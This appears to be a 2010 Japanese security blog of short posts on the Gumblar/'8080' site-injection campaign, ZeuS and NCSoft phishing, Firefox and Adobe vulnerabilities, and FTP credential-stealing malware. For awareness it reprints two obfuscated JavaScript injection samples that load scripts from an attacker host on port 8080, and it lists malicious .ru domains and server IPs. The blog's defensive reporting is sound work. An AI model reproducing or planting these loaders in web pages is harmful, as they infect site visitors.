UnderForge of Lack

国際母語デー
日刊新聞創刊の日
食糧管理法公布記念日 現行法
漱石の日
ファミリーベーシックv3の発売(1985年) 9,800円

----------
二日酔いの日(for me)
----------
So, just prevent everything
Is "Green IT" Defeating Security?
ノーフォークのNuke事件に関して、CIOが「節電のために電源をOFFにした人だけが感染した」と発言したことに関して。
正確な説明と全体像の提示を行わないと、こういう事態を今後も繰り返すことになるでしょう。

Employees must have the "big picture" to be of any help. Counting on updating our AV program is just is not a viable methodology any more. While it is imperative that we keep doing our jobs by keeping definitions as updated as possible, (and prevent over-ride of security settings), we are still back to the subject of application patching. All the glorious AV definitions in the world will not prevent an employee from making that search that redirects, or opening an attachment that starts the proverbial ball rolling toward weeks of clean-up and bad press via media hype.
対ウィルスソフトの重要性は変わっていませんが、本当にそれが役に立っているのかは微妙なところです。そして、従業員が（表面上は危なくない）陥落サイトにリダイレクトされる危険性を防いではくれません。

やはり逃げ回るしかないのかなぁ・・とか半分諦観している今日この頃。シス管諸氏の悩みのタネは今後も尽きないようです。

----------
TLDcc
The .ru Substitutions for .cn Domains
cnnicの方針変換により、劇的に減少した悪意 .cn ドメインに変わって、.ru が台頭してきたっと・・

もともと、.cnドメインでも中国国内から直接飛んでくる例は（4134とその仲間たちを除いて）減少傾向にありました。最近はロシアの皮を被った、ヨーロッパの悪意サーバ群が異常に活発です。更にロシア以外の、.pl .uk .cz なども増加傾向にあり、vc hn sc io nz gs la といった、見慣れないなドメインも飛んできており、TLDccによって悪意サイトかどうかを判断することは（そもそも元から無理がありましたが）ますます難しくなっています。
悪意サイトのホスティングは、ある意味「仕方が無い」部分もあるかもしれませんが、問題はテイクダウンに対する明確な取り決めや指標がなければ「無視している」と取られてもしかたのないところもあります。
こうした取り決めを標準化するのは各Certの役目・・・のはずですよね？

参考：
ZeuS/zbot - Outlook Web Access利用者を狙うスパム
ドメインは最近の流行にあわせて .pl
ZeuS/zbot - Facebook and Visa の継続
TLDがいろいろバリエーションが変わって、しかも増えています。
vc hn sc io nz gs la
ドメイン取得しやすいレジストラでいろいろ実験しているのかもしれません。

※そういえば ASN を個人で取ってる人がいらっしゃるらしいという話がIRCで盛り上がっていましたが・・
(45679かな・・？)
AS番号リスト (2010/02/20現在)

----------
3322.org
Two Chinese schools implicated in Google Aurora attacks
が、こうなったと・・？
グーグルへのサイバー攻撃「中国２校が発信」　米紙報道

3322.org ってそんなスゴイ存在だったのかぁ・・（苦笑していいものやら）

----------
Hardening Wordpress
WPを使っている方へ
Hack Proof WordPress

----------
Twitter LOL釣り again
Twitterを使っている方へ
Hack Proof WordPress
If you receive a DM asking "LOL is this you," it's not. It's phishing. Don't enter your password!
またか・・

----------
炉
aurora, zeus, phishing, pushdo,rogue domains to block
lots of fake antivirus, aurora, zeus, and botnet domains to block. Sources include google.com safebrowsing, threatexpert.com, hosts-file.net and others:

----------
OSS thru ..?
オープンソースソフトウェア、仕事で開発するプロダクトに使ってる?
「高度情報化社会における情報システム・ソフトウェアの 信頼性及びセキュリティに関する研究会 」
ぐわっ・・・なにこの "bunch of PDFs"は！？

OSSの問題は考えれば考えるほどづつう（変換不能）になりますが、実際には割と何も考えずに使っているような気もします。こういうのって社内や納品先でコンプライアンス（？）の検証とかやるもんなのでしょうかネ？

ただ、（古い）IEやOEを使い続けることが「安全ではない」という認識は少しづつ広まっている気がします。

----------
統一
「そろそろ互換性を持たせてもいいじゃないか?」という規格は?
OSネタは危険なことになりそうなのでスルーしておいて、ウィルス名と電子マネーとUSBとUAとインデント（笑）は統一して欲しいな～

----------
8080
現在改良中：

	count	ASN	登録	更新
94.23.11.38	7297	AS16276	02/17 10:35:20	02/21 10:20:40
91.121.24.139	6380	AS16276	02/17 10:35:20	02/21 10:20:40
80.69.74.73	5750	AS20857	02/17 10:35:20	02/21 10:20:40
91.121.172.32	5422	AS16276	02/17 10:35:20	02/21 10:20:40
91.121.108.53	4836	AS16276	02/17 10:35:20	02/21 10:20:40
188.72.211.253	3485	AS28753	02/17 10:35:20	02/21 10:20:40
91.121.221.181	1628	AS16276	02/19 23:30:35	02/21 10:20:40
87.233.139.100	1481	AS15703	02/17 10:35:20	02/21 10:20:40
91.121.7.26	1314	AS16276	02/20 05:50:34	02/21 10:20:40
213.251.164.84	1223	AS16276	02/17 10:35:20	02/21 10:20:40
188.40.118.68	1223	AS24940	02/17 10:35:20	02/21 10:20:40
94.23.199.154	1223	AS16276	02/17 10:35:20	02/21 10:20:40
78.31.107.49	1223	AS24931	02/17 10:35:20	02/21 10:20:40
77.68.44.169	1223	AS15418	02/17 10:35:20	02/21 10:20:40
91.121.180.112	1036	AS16276	02/20 00:30:36	02/21 09:30:43
85.17.58.10	185	AS16265	02/20 06:50:47	02/21 07:40:34
89.149.244.211	108	AS28753	02/20 08:30:31	02/21 06:30:27
78.41.156.236	107	AS6908	02/18 20:00:43	02/21 03:00:40
91.204.116.79	76	AS44976	02/20 04:50:59	02/21 02:40:36
84.200.227.144	299	AS31400	02/17 12:30:27	02/20 23:30:33
87.106.247.193	55	AS8560	02/17 19:40:50	02/20 23:30:33
85.14.202.210	37	AS13301	02/20 04:50:59	02/20 23:30:33
88.80.221.41	335	AS39023	02/18 06:40:49	02/20 22:40:41
92.51.132.101	11	AS20773	02/20 14:50:38	02/20 15:00:33
91.121.78.185	144	AS16276	02/20 00:40:38	02/20 06:30:57
213.186.60.175	60	AS16276	02/20 00:30:36	02/20 05:20:33
62.75.218.192	257	AS8972	02/17 12:30:27	02/20 04:40:46
78.46.46.3	16	AS24940	02/20 04:30:27	02/20 04:40:46
95.168.170.89	50	AS28753	02/19 22:40:46	02/20 04:20:39
89.110.147.181	534	AS24989	02/17 13:30:59	02/20 02:40:53
91.121.1.99	101	AS16276	02/17 21:00:39	02/19 08:20:32
213.251.133.159	76	AS16276	02/17 18:00:50	02/19 06:20:46
88.191.63.28	7	AS12322	02/20 04:50:59	---
82.192.88.35	5	AS16265	02/19 21:20:43	---
91.121.74.84	5	AS16276	02/19 21:20:43	---
91.121.93.220	5	AS16276	02/19 21:20:43	---
91.121.142.111	5	AS16276	02/19 21:20:43	---
217.23.5.27	5	AS49981	02/19 21:20:43	---

テーブル構成まで自動化できるようになったので楽になりました（笑）
今後 50IPを増えたらどうするか考えることにします

追記：
Tさんへ

追記2：
以下のドメインを検索対象から除外します。
ampsguide・ru
burkewebservices・ru
carswebnet・ru
easylifedirect・ru
freeprosports・ru
funwebmail・ru
guidebat・ru
homeproair・ru
homesaleplus・ru
lagworld・ru
suesite・ru
superaguide・ru
theatticsale・ru
theaworld・ru
thechocolateweb・ru
thelaceweb・ru
themobilewindow・ru
themobisite・ru
viewhomesale・ru
webdesktopnet・ru
webdirectbroker・ru
webnetenglish・ru
webnetloans・ru
whosaleonline・ru
worldsouth・ru
worldwebworld・ru

現在の検索対象：
avattop・ru
authentictype・ru
biltop・ru
cobalttrueblue・ru
cometruestar・ru
counterbest・ru
gametopsite・ru
genuinecolors・ru
genuinehollywood・ru
livesitedesign・ru
newusaguide・ru
recentmexico・ru
sitemape・ru
superhighest・ru
supertruelife・ru
theantimatrix・ru
thetruehelp・ru
toplinemarine・ru
truelifefamily・ru
truesoulonline・ru
trueworldmedia・ru
xxlwebhost・ru
yourauthentic・ru
yourtruecrime・ru
yourtruegame・ru
yourtruemate・ru

----------
Google Safe Browsing
| 1266714021 | B | [goog-black-hash 1.51490 update]
| 1266714003 | M | [goog-malware-hash 1.19522 update]
| 318682 | -5681(324363) テイクダウン開始！
| 1394754 |
EoF

ちょっとイヤ～な感じっぽいので注意喚起です。

Mozilla Firefox Unspecified Code Execution Vulnerability 4
A vulnerability has been reported in Mozilla Firefox, which can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to an unspecified error and can be exploited to execute arbitrary code.
The vulnerability is reported in version 3.6. Other versions may also be affected.
え”？

VulnDisco 9.0
People who've seen firefox exploit agree with me - it is a really cool bug, it was an interesting challenge to find and exploit it. The exploit needs some work, but it was quite reliable in our testing.

Attack code for Firefox zero-day goes wild, says researcher

攻撃ベクトルがはっきりしないので、緩和策の提示ができませんが、注意喚起しておきます。

※ど・・どうすりゃいいんでしょう！？
Do not visit untrusted websites or follow untrusted links.
・・・・・・

先日、16ヶ月も脆弱性放置していたということで批判を受けていた Adobe ですが、汚名返上を目指してがんばっています。
Security update available for Adobe Flash Player

Flash: version 10.0.45.2
※セキュリティソフトを既に導入されているところは、二重インストールを防ぐためにMcAfee Security Scan Plusのチェックボックスを外して下さい。　

Adobe Flash Player 9 — Debugger Versions (aka debug players or content debuggers) for Flex and Flash Developers

AIR: 1.5.3.1930

現時点で、この脆弱性 (CVE-2010-0186、CVE-2010-0187：どちらも *reserved*)が攻撃に使用されているという報告は無いようです。
IEとその他ブラウザを併用している方は、必ず両方の更新を行ってください。

Adobe Flash Player : バージョンチェックで、バージョン情報が変わらない場合は、一度アンインストールして再インストールが必要な場合があります。
ウチもそうなりました・・

アンインストーラ：入手先
Flash Player Uninstaller*

----------
Adobe Reader and Acrobat
Pre-Notification - Security update for Adobe Reader and Acrobat
Security Advisory for Adobe Reader and Acrobat
Adobe is planning to release an update for Adobe Reader 9.3 for Windows, Macintosh and UNIX, Adobe Acrobat 9.3 for Windows and Macintosh, and Adobe Reader 8.2 and Acrobat 8.2 for Windows and Macintosh to resolve critical security issues, including the Flash Player issue described in Security Bulletin APSB10-06. Adobe expects to make these updates available on February 16, 2010.
2/16(日本2/17)に、Adobe Reader/Acrobat のほうもアップデートが予定されています。


----------
keep update!
----------

WIDEプロジェクトIRCワーキンググループによるIRCサーバ運用終了について

実際にクローズになると思うと寂寥の感があります。

これまで本当にお世話になりました。
改めて感謝します

どうもありがとうございました。

FTP アカウント情報を盗むマルウエアに関する注意喚起
このアカウント窃取の対象となるソフトウエアは、FTP クライアントを含む複数の製品にのぼります。JPCERT/CC では、以下の FTP クライアントにてマルウエアによるアカウント窃取、および外部サーバへのアカウント情報の送信を確認しました。

- ALFTP 5.2 beta1
- BulletPloof FTP Client 2009.72.0.64
- EmFTP 2.02.2
- FFFTP 1.96d
- FileZilla 3.3.1
- FlashFXP 3.6
- Frigate 3.36
- FTP Commander 8
- FTP Navigator 7.77
- FTP Now 2.6.93
- FTP Rush 1.1b
- SmartFTP 4.0.1072.0
- Total Commander 7.50a
- UltraFXP 1.07 ※公式サイト http://www.ultrafxp.com 消失
- WinSCP 4.2.5

上記に加えて、以下の Web ブラウザのアカウント管理機能を用いて保存され
ている情報をマルウエアが窃取し、外部サーバに送信している事を確認しまし
た。

- Microsoft社 Internet Explorer 6
(Internet Explore 7 および 8 ではアカウント窃取は確認されておりません)
- Opera社 Opera 10.10

JPCERT/CCが、自信を持って名指ししてますので、十分に検証したのでしょうネ。
以前に Unmask Parasitesが挙げた「 使用すべきでない10のFTPクライアント」と比較すると、さらに使用すべきでないFTPクライアントが増えてしまいます。

こうなると、印象的に安心して使える FTPクライアントがすごく限られてしまうような・・・

何度も言っているように、まずは「感染しないこと」が重要なのは言うまでもありません。

※どっちのマルウェアの検証結果なのか謎ですが、恐らくは 8080/QuickSilver のことを指していると思われます

------
結果的に、key(id_rsaなど）を登録できる環境下にあるなら　FTP を捨て、SFTP(SSH L2) による鍵認証+パスフレーズが一番いいような気がしてきました。
公開鍵認証と認証エージェントを併用する
FileZilla 側には一切パスワードを入力せずに接続できるようになります。

これなら FileZillaでも、WinSCPでもOK・・・かな
問題は 22 番をどこか別のPortに移動して、shellを抑制する(rsshなど）をきちんと設定することですが・・

This must be yet another revision

またか～と頭が痛くなりますね
アンチウィルスソフトに引っかかると、GoogleBlockされる（笑）可能性がありますので、以下の変更を行っています。
( → （
) → ）
/ → ／

try{window.onload=function（）{Iebf2d21q07z = '' + 'i）c（#i$b）!a&$-$（c$（））o&）m（（.@c&）!o&（@n（&s!）（t@!#a）n@!!t（@&（@c^$^#o^#n&t!a&&c!t（.!#（c（&@^o））$^m#&&.@&p@e@）^r&e#@）$z@h#（i!l!#^t（（@o@n!@@^-#$^c）^（o（&m）.#（b^i）$l&$（&!t$o^&!p^&.@&#&r!（u$:@））N#q#@5#（^b!（&@h$3）f&@）i#@t&$w&!1@r$#v!$／!&@$g####o（$@&&o（g$l）@!e@$.@（c$$
（）o&m&.$@（a^u!／^##g））（）o#^o#&#g$#l!^）e$$.&#c!o（$@m（$.!^^a!u）^!／@!t#$@o（（$r（!#r&（&e#^n$t^@^$s!&$^.（@r#!@u）$#&／（a@$l$#l!（e!^g$）（r&$#）o$^&.^p（）l!）^@／#$$##g#$o）@$o）$#^g（&l（e@.#!c&o&@m$#／^
'.replace（／#|@|\^|\$|\!|&|\）|\（／ig, ''） ;
Jq2dz9nff1w0lm = 'appendChild';Rkn5tmljhj1c = d ocument.createElement（'sc'+'ript'）;
Rkn5tmljhj1c.src = 'h'+'ttp:／／'+Iebf2d21q07z.replace（／Nq5bh3fitw1rv／g, '8080'）;Rkn5tmljhj1c.setAttribute（'defer', 'def'+'er'）;e val（'document.body.'+Jq2dz9nff1w0lm+'（Rkn5tmljhj1c）'）;} } catch（P052l4jn ） {}

decode:
iciba-com.constantcontact.com.perezhilton-com.biltop .ru:8080/google.com.au/google.com.au/torrents.ru/allegro.pl/google.com/

また、散布ISPにも変動があり、
77.72.25.34 AS44062(TESENE)
83.168.238.66 AS35041(NET-CRYSTONE)
の２者が参戦しています。

どこまで勤勉なんでしょうね・・・

スルーの日としていましたが、一言謝辞を

皆様ありがとうございます。

おそらく
ライフハッカーのFFFTPに関する誤報
こちらが真相なのでしょう。

書き方が多少過激だったのは認めます。

当方としては既に 「FileZillaは使わないように！」と何度も書いていた部分もあり（XMLの平文でパスワードを保存するため）、そうした「使用すべきでない」FTPクライアントに FFFTP がまた一つ加わっただけという印象しかもっていなかったのは、FFFTPという非常に広範なファンをもつソフトウェアに対する「思い入れ」に想いをめぐらせなかった私の不徳の致すところです。
※今見返してみましたが、Passwordを保存しないように！と、使用しないように！がごっちゃになってますね（苦笑）

また、デフォルトでレジストリに書き込まれており、アンインストールが正常に行われなかった場合、レジストリだけが残ってしまっているケースがあると思われます。そういう点を鑑みても、既存のFTP のパスワードの変更と、今後のFTP接続先の制限は、平文FTPを許諾する以上、絶対に必要なファクターであると考えています。

怪我の功名といえるかどうかわかりませんが、平文のFTPが危険なものであり、FTPクライアントのパスワードを安易に保存することが、いかに恐ろしいか？ということが曲がりなりにも広まったことで、今後のセキュリティ意識の向上につながったかもしれない、と、好意的に受け取っていただければ幸いです。

また、ISP各社様におかれましては、この機会に FTPS への対応を進めていただきたいと思います。
※SFTPに関しては、そのプロトコルの違いや、SSHとは何か？という部分をきちんと説明してから、ユーザに開放したほうが望ましいと考えています。（某社のように SSH=Port2222 というのもアリですね）

まず、FFFTPの作者のSota様にお詫び申し上げます。

FFFTP が 8080系の攻撃誘引を行っているような印象を与えてしまったことに関して、意図したものではありませんが誤解を招く表現があったことを重ねてお詫び申し上げます。

最大の防御策は言うまでも無く、ウィルス・マルウェアに感染しないことです。それが早い段階で徹底できていれば、ここまで事態が悪化することは無かったでしょう。

非SSL/TLSのFTP Credential送信は telnetと同様に極めて危険であることを認識し、非SSL/TLSのものを当サイトとしては推奨することはできなかったということを理解いただければ幸いです。

当サイトは特定の事業者、個人を攻撃するものではなく、セキュリティという、普段は厄介者扱いされるものを他と違った視点で見つめるものでした。その意図が捻じ曲げられて吹聴されることは非常に残念です。

------------
EoF

NCSoft Phishing

From: makelelejr@hotmail.com
To: makelelejr@hotmail.com
Subject: Password Reset Success
Date: Thu=2C 28 Jan 2010 10:46:17 +0800

Someone 65.255.34・173 Aion has been reset to your game account password. If you not make the change=2C please contact support hｔｔps://secure.ncsoft.com/login.20

Phishing Site:
hXXp://www.secure-ncsoft-nic.com
216.245.220.121 via LimeStone

Redirection:
hXXp://safe.saouar-ncsoft.com/
67.231.248.13 via ?(謎AS)
route-record : MISSING!
おいおい・・

LimeStoneなので、通報すれば即テイクダウンするでしょうが、ドメインや収容先は当然、変動の恐れがあります。

NCSoft(韓国のネットワークゲーム・ベンダー）のユーザは気をつけましょう。
公式のログイン先は
https://secure.ncsoft.com/loginです。

炎上中の模様：
ttp://www.aionsource.com/forum/aion-discussion/104445-consolidated-phishing-attempt-thread-your-password-has-been-reset-check.html
安全性に自信が持てないので自己責任でお願いします。

注意喚起
約７時間ほど前に、8080系の使用していた ru ドメインのうちの殆どが A レコードを失い、正引き不能になりました。
それと同時に、いくつかのインジェクションが変更された模様です。

こうしたインジェクション攻撃は、定期的にパターンを変更する傾向がありますので注意してください。
※8080系は Symantecの主張するガンブラー™と名づけられた攻撃手法の一つです。

ampsguide.ru
anycitytown.ru
authentictype.ru
burkewebservices.ru
carswebnet.ru
easylifedirect.ru
freeprosports.ru
funwebmail.ru
guidebat.ru
genuinehollywood.ru
genuinecolors.ru
halfsite.ru
homeproair.ru
homesaleplus.ru
lagworld.ru
saletradeonline.ru
suesite.ru
sugaryhome.ru
superaguide.ru
superpropicks.ru
theatticsale.ru
theaworld.ru
thechocolateweb.ru
thelaceweb.ru
themobilewindow.ru
themobisite.ru
viewhomesale.ru
webdesktopnet.ru
webdirectbroker.ru
webnetenglish.ru
webnetloans.ru
webnetenglish.ru
whosaleonline.ru
worldsouth.ru
worldwebworld.ru
yourtruemate.ru
※赤い色のドメインが残留、更にドメイン変更の可能性大。

----------
/* */ 消去？
From Hidden Iframes to Obfuscated Scripts -- comment
The script has a new revision already out and being injected into sites. A sample:

＜script＞ try{window.onload=function（）{document.write（'＜div id=megaid＞skysports-com.marketwatch＜/div＞'）;Whglbtpkg9yawk = document.getElementById（'megaid'）.innerHTML + '.）c^o#$$#m@（@.&&（!t&o（&&r##&&r!（$#e#@!n@t!s!）-@（r（u@$^.$$&y）!!o&!u#!!r##!t!&@!o@（$&p!@（&f$@i^l$m）^!@s（.（））r!#（&u!）@:&!&#）D）E）&#&B）（）U^&（@G&@（@/#（^c（（a!m）##）$4#@@.#&^c####&o（#!m）/@^c$&a^）@m（4&#.!@）（^c（$o@m!&!/（g）!!o&&#$o!g&（l&）^^e&#@.&^c#（o^&m!^$/（#m!^^c（&s$s@）l!^$.^&$c（（$o#（@m）（/@!&g@#o&!!$@o$##g$@#l$e&&）.#$c^#o$#!m#&）$.）（#e&&）^g）&/&'.replace（/&|#|\$|\）|\!|\（|\^|@/ig, ''） ;document.write（'＜scr'+'ipt src=http://'+Whglbtpkg9yawk.replace（/DEBUG/g, '8080'）+'＞＜/scr'+'ipt＞'）;} } catch（Xvp1q8pu ） {}＜/script＞
＜!--50e1dd63239a5e1b3900972f2e5de214--＞

という感じで攻撃手法の変更が報告されています。

2010.02.02
一部アンチウィルスソフトにひっかかると（携帯に）連絡があったので、半角括弧を全角に変更しました。

あぁ・・いたちごっこ

----------
あ～あ～
サーバーアプリの脆弱性突かれ、共有サーバー丸ごと改ざん
スタンダード10で提供しておりますfig(フォトアルバム)のセキュリティホールを利用し、不正なプログラムを設置、実行されたことが原因であると思われます。問題が発生した当該プログラムは削除済みです。

2010.01.06 水曜日
これかな（笑）
修正済みかと思ったけど、そうでもなかったらしいですね

----------
その他

iSlateなのか iPadなのか ・・・
明日がたのしみ・・・

６万５千円のディナーショー（CTスキャンつき？）お疲れ様でした（笑）

sophosのvirus info は詳細が無いので役に立たないと思うんですけど・・・

EoF(追記中）